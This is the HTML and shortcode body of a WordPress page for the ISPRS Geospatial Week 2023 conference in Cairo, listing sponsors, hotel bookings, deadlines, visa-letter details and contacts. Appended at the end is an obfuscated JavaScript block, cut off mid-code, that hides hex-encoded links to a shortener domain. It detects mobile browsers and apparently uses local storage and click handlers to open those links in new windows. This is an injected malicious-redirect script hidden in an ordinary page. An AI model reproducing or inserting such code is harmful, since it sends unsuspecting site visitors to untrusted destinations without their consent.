</a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 